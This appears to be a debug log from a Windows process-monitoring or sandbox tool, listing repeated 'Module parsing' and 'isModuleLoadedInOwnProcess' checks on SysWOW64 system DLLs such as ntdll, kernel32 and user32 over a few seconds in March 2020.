2020-03-24 10:16:36,072 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:16:36,088 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
2020-03-24 10:16:36,088 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\mswsock.dll
2020-03-24 10:16:36,104 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\WSHTCPIP.DLL
2020-03-24 10:16:36,104 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\nlaapi.dll
2020-03-24 10:16:36,118 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\NapiNSP.dll
2020-03-24 10:16:36,118 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\pnrpnsp.dll
2020-03-24 10:16:36,134 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\dnsapi.dll
2020-03-24 10:16:36,134 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winrnr.dll
2020-03-24 10:16:36,134 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\IPHLPAPI.DLL
2020-03-24 10:16:36,151 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winnsi.dll
2020-03-24 10:16:36,151 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rasadhlp.dll
2020-03-24 10:16:36,151 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,151 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,165 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:36,165 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:36,509 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:16:36,525 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:16:36,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,789 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:36,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:36,805 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:36,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:36,821 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:16:36,821 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:16:36,821 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:16:36,836 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:16:36,836 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:36,836 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:36,852 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:16:36,852 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:16:36,852 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,868 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,868 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,868 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:16:36,868 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,884 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,884 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,884 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,884 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,914 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,914 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,914 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,914 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:16:36,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,946 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,946 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,946 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,946 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,961 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,961 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,961 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,993 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:16:36,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:16:37,009 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:37,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:37,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:37,023 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:37,023 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:37,023 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:16:37,023 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:16:37,039 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:16:37,039 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:16:37,039 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:16:37,055 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:16:37,055 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:37,055 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:37,071 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,071 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,086 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,086 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,086 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,118 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,118 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,118 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,132 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,132 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,132 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,148 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,148 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,148 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,164 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,164 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,164 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,180 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,180 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,180 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,180 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,196 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,196 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,196 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,243 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,243 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,243 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,243 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,257 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,305 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,305 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,305 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,321 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,321 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,321 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,351 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,351 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,367 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,367 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,367 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,367 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,382 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,382 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,382 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,382 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,398 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,398 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,398 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,414 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,430 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,430 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,430 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,430 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,460 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,460 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,460 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,476 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,476 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,476 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,476 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,492 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,492 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,507 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,507 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,507 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,523 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,523 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,539 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,539 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,539 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,585 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,585 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,585 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,585 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,601 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,601 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,601 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,601 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,617 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,617 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,632 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,632 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,632 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,648 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,648 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winmm.dll
2020-03-24 10:16:37,648 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,648 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,678 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,678 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,678 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,678 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
